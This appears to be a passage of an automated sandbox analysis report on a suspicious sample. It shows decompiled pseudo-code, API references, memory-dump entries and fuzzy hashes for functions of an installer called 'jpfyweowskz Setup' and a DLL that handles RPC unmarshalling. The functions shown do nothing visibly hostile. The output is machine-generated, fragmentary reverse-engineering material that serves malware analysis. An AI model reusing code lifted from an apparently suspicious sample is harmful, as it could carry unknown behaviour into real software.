					E6EDACC40( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12);
					E6EDA73B0(_a4 + 0x14, (_v8[1] & 0x000000ff) + 1);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					E6EDAAF50(_a4, _v8[2] & 0x0000ffff);
					E6EDACE70( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
					return E6EDAC570(_a4, _a8, _a12);
				}
				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return _t41;
			}






                                                                                                0x6eda4f59
                                                                                                0x6eda4f6d
                                                                                                0x6eda4f7b
                                                                                                0x6eda4f81
                                                                                                0x6eda4f87
                                                                                                0x6eda4fbb
                                                                                                0x6eda4fd8
                                                                                                0x6eda4ff2
                                                                                                0x6eda5007
                                                                                                0x6eda501b
                                                                                                0x6eda503f
                                                                                                0x00000000
                                                                                                0x6eda5058
                                                                                                0x6eda4f95
                                                                                                0x6eda4fa2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4FA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: adcfe8712905135a252fa3ddf566cbd0a5e08c54d0dd38fe805b183a312d6644
                                                                                                • Instruction ID: e747e2269ff5c043d7f51d312ea16b1634fa1ba981c077842e9342348b78d266
                                                                                                • Opcode Fuzzy Hash: adcfe8712905135a252fa3ddf566cbd0a5e08c54d0dd38fe805b183a312d6644
                                                                                                • Instruction Fuzzy Hash: 5A3130B5904108BBCB44CFD8D890DAE77B9AF89205F14C598F9599B341E631EB50DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA5E80(signed int _a4, signed char* _a8) {
				signed char* _v8;
				signed char* _v12;

				_v8 = _a8;
				0x6eda0000("(%p, %p)\n", _a4, _a8);
				_a8 = _a8 + 6;
				if(( *_v8 & 0x000000ff) == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					E6EDAD650( *_v12 & 0x000000ff, _a4, _v12);
					E6EDA73D0(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					E6EDAAF00(_a4, _v8[2] & 0x0000ffff);
					E6EDADE30( *_v12 & 0x000000ff, _a4, _v12, 0);
					 *((intOrPtr*)(_a4 + 0x18)) = (_v8[2] & 0x0000ffff) +  *((intOrPtr*)(_a4 + 0x18));
					E6EDAC7E0(_a4, _a8);
					return  *((intOrPtr*)(_a4 + 0x18));
				}
				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}





                                                                                                0x6eda5e89
                                                                                                0x6eda5e99
                                                                                                0x6eda5ea7
                                                                                                0x6eda5eb3
                                                                                                0x6eda5ee9
                                                                                                0x6eda5efb
                                                                                                0x6eda5f15
                                                                                                0x6eda5f2a
                                                                                                0x6eda5f3e
                                                                                                0x6eda5f57
                                                                                                0x6eda5f6f
                                                                                                0x6eda5f7a
                                                                                                0x00000000
                                                                                                0x6eda5f85
                                                                                                0x6eda5ec1
                                                                                                0x6eda5ece
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5ECE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3815017672
                                                                                                • Opcode ID: a73272936a7fea971f11e8bae1bd3dcd0dc0def5d07a6b41bf56421482e5c67c
                                                                                                • Instruction ID: b461bad856a7741ea7e81a2e912dcaf0d84386c44faabeaf2b22e17e5b5bbe34
                                                                                                • Opcode Fuzzy Hash: a73272936a7fea971f11e8bae1bd3dcd0dc0def5d07a6b41bf56421482e5c67c
                                                                                                • Instruction Fuzzy Hash: A13162B5900108BBCB04CFD8D891DADBBB9AF89209F14C198FD499B341E631EF51DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 51%
                                                                                                			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}













                                                                                                0x004044be
                                                                                                0x004044c2
                                                                                                0x004044ca
                                                                                                0x004044cd
                                                                                                0x004044ce
                                                                                                0x004044d0
                                                                                                0x004044d2
                                                                                                0x004044d5
                                                                                                0x004044d5
                                                                                                0x004044dc
                                                                                                0x004044e2
                                                                                                0x004044e2
                                                                                                0x004044e9
                                                                                                0x004044f4
                                                                                                0x004044f5
                                                                                                0x004044f8
                                                                                                0x004044f8
                                                                                                0x00404505
                                                                                                0x00404510
                                                                                                0x00404513
                                                                                                0x00404525
                                                                                                0x0040452c
                                                                                                0x0040452d
                                                                                                0x0040453c
                                                                                                0x0040454c
                                                                                                0x00404568

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                                                                                • wsprintfA.USER32 ref: 0040454C
                                                                                                • SetDlgItemTextA.USER32 ref: 0040455F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                                • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                                                                                • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                                                                                • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA46B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA46B0(intOrPtr _a4, signed int* _a8, void* _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t42;
				void* _t61;
				void* _t64;

				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 = _a12 + 1;
				_v12 = E6EDAF410(_a4,  &_a12);
				0x6eda0000("unmarshalled discriminant %x\n", _v12);
				_t64 = _t61 + 0x24;
				_a12 =  *_a12 + _a12;
				_v8 =  *_a12;
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					_t42 = _v8 & 0x0000ffff;
					__imp__NdrAllocate(_a4, _t42);
					 *_a8 = _t42;
				}
				if((_a16 & 0x000000ff) != 0) {
					E6EDB0770( *_a8, 0, _v8 & 0x0000ffff);
					_t64 = _t64 + 0xc;
				}
				return E6EDAED20(_a4, _a8, _v12, _a12, 0);
			}








                                                                                                0x6eda46cc
                                                                                                0x6eda46da
                                                                                                0x6eda46ed
                                                                                                0x6eda46f9
                                                                                                0x6eda46fe
                                                                                                0x6eda470a
                                                                                                0x6eda4713
                                                                                                0x6eda471d
                                                                                                0x6eda4727
                                                                                                0x6eda4727
                                                                                                0x6eda4731
                                                                                                0x6eda4733
                                                                                                0x6eda473c
                                                                                                0x6eda4745
                                                                                                0x6eda4745
                                                                                                0x6eda474d
                                                                                                0x6eda475c
                                                                                                0x6eda4761
                                                                                                0x6eda4761
                                                                                                0x6eda4781

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                                • API String ID: 3995017260-139691638
                                                                                                • Opcode ID: d4dcd74a8e6caaa6ed8f6088586d6328da12b4c8a63080247b15a3db9a278451
                                                                                                • Instruction ID: 29c4a5bcdccc7afffe62c0f37bfaf8810d7f9802c8b83d37013864a3b251c71d
                                                                                                • Opcode Fuzzy Hash: d4dcd74a8e6caaa6ed8f6088586d6328da12b4c8a63080247b15a3db9a278451
                                                                                                • Instruction Fuzzy Hash: 1D2151B5A00249EBCB04CFA8DC50AEF77B9AF49605F008558FE158B241E731DA50CBB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 51%
                                                                                                			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                0x00401bb6
                                                                                                0x00401bc2
                                                                                                0x00401bc5
                                                                                                0x00401bce
                                                                                                0x00401bce
                                                                                                0x00401bd1
                                                                                                0x00401bd5
                                                                                                0x00401bde
                                                                                                0x00401bde
                                                                                                0x00401be1
                                                                                                0x00401be5
                                                                                                0x00401be7
                                                                                                0x00401c34
                                                                                                0x00401c36
                                                                                                0x00401c3f
                                                                                                0x00401c47
                                                                                                0x00401c4a
                                                                                                0x00401c4a
                                                                                                0x00401c53
                                                                                                0x00000000
                                                                                                0x00401be9
                                                                                                0x00401bf0
                                                                                                0x00401bf2
                                                                                                0x00401bfa
                                                                                                0x00401bfd
                                                                                                0x00401c25
                                                                                                0x00401c59
                                                                                                0x00401c59
                                                                                                0x00401bff
                                                                                                0x00401c0d
                                                                                                0x00401c15
                                                                                                0x00401c18
                                                                                                0x00401c18
                                                                                                0x00401bfd
                                                                                                0x00401c5c
                                                                                                0x00401c5f
                                                                                                0x00401c65
                                                                                                0x00402825
                                                                                                0x00402825
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                                • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                                                                                • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                                                                                • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040373D, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x5ff628
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "jpfyweowskz Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x2
						_t27 =  *0x42eb88; // 0x5ff7d4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x5ff7ec
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                                0x00403741
                                                                                                0x00403746
                                                                                                0x0040374c
                                                                                                0x00403751
                                                                                                0x00403751
                                                                                                0x00403759
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040375b
                                                                                                0x00403761
                                                                                                0x00403769
                                                                                                0x0040376b
                                                                                                0x00403771
                                                                                                0x00403771
                                                                                                0x00403773
                                                                                                0x0040377f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403783
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403785
                                                                                                0x0040378a
                                                                                                0x00403793
                                                                                                0x00403799
                                                                                                0x0040379e
                                                                                                0x004037b2
                                                                                                0x004037bd
                                                                                                0x004037d5
                                                                                                0x004037db
                                                                                                0x004037e0
                                                                                                0x004037e8
                                                                                                0x00403809
                                                                                                0x00403809
                                                                                                0x00403809
                                                                                                0x004037ea
                                                                                                0x004037ec
                                                                                                0x004037ec
                                                                                                0x004037f0
                                                                                                0x004037f3
                                                                                                0x004037f7
                                                                                                0x004037f7
                                                                                                0x004037fc
                                                                                                0x00403802
                                                                                                0x00403802
                                                                                                0x00000000
                                                                                                0x004037ec
                                                                                                0x004037a0
                                                                                                0x004037a5
                                                                                                0x004037ae
                                                                                                0x004037a7
                                                                                                0x004037a7
                                                                                                0x004037a7
                                                                                                0x004037a5

                                                                                                APIs
                                                                                                • SetWindowTextA.USER32(00000000,jpfyweowskz Setup), ref: 004037D5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: TextWindow
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\$jpfyweowskz Setup
                                                                                                • API String ID: 530164218-188207588
                                                                                                • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                                • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                                                                                • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                                • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAE9C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C5), ref: 6EDAEA69
                                                                                                Strings
                                                                                                • falling back to empty default case for 0x%x, xrefs: 6EDAEA7F
                                                                                                • type %04x, xrefs: 6EDAEA2E
                                                                                                • no arm for 0x%x and no default case, xrefs: 6EDAEA57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: falling back to empty default case for 0x%x$no arm for 0x%x and no default case$type %04x
                                                                                                • API String ID: 3997070919-939914449
                                                                                                • Opcode ID: f75d763780fa64bc6e4a048f16bee0d81d9e2f3bae0e0baf40580766570b0415
                                                                                                • Instruction ID: 3e342b4ad4ee7948a339752d333239a89e1187a8b2d6cb7622ed1d7fcc1d97c5
                                                                                                • Opcode Fuzzy Hash: f75d763780fa64bc6e4a048f16bee0d81d9e2f3bae0e0baf40580766570b0415
                                                                                                • Instruction Fuzzy Hash: 9E219AA4A1425AEBCB00DFE8C8805BE73B2FF45745F108968EE529B240F370DBA0D765
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6AF0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA6AF0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				signed int _t29;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				_a12 = _a12 + 6;
				_t29 =  *_v8 & 0x000000ff;
				if(_t29 == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					E6EDAE210( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					return E6EDACA30(_a4, _a8, _a12);
				}
				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return _t29;
			}






                                                                                                0x6eda6af9
                                                                                                0x6eda6b0d
                                                                                                0x6eda6b1b
                                                                                                0x6eda6b21
                                                                                                0x6eda6b27
                                                                                                0x6eda6b58
                                                                                                0x6eda6b77
                                                                                                0x6eda6b8c
                                                                                                0x00000000
                                                                                                0x6eda6ba5
                                                                                                0x6eda6b35
                                                                                                0x6eda6b42
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6B42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: 232b65a044e6c7881550a39647faaff6c3178238ba8464f9fc68479e9b32cde7
                                                                                                • Instruction ID: 54ab135d15a82df9703553afce22e300ec8ffb09c79e6390dacd696f18b05904
                                                                                                • Opcode Fuzzy Hash: 232b65a044e6c7881550a39647faaff6c3178238ba8464f9fc68479e9b32cde7
                                                                                                • Instruction Fuzzy Hash: 33215EB5900109EBCB04CFD8D890DBEB7B9AF89305F148588F9198B341E630DF50DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4A50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4AB9
                                                                                                • NDRSContextUnmarshall2.RPCRT4(?,?,?,00000000,00000000), ref: 6EDA4ADB
                                                                                                Strings
                                                                                                • (%p), xrefs: 6EDA4A58
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA4AA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall2
                                                                                                • String ID: (%p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3284517403-2888871361
                                                                                                • Opcode ID: ec37d1fd271bb769bec2de28cbd073d7115d9d84ab5776f6cb6b926dbb90de36
                                                                                                • Instruction ID: 1bb1ac1d5b291f13b22f3844b217dae713bea6c6d9476acf6b5d94248363a93b
                                                                                                • Opcode Fuzzy Hash: ec37d1fd271bb769bec2de28cbd073d7115d9d84ab5776f6cb6b926dbb90de36
                                                                                                • Instruction Fuzzy Hash: D2210BB9600204EFC704CF48D890E59BB66EF89759F14C158FA499F386D632EE91CBE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA23B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
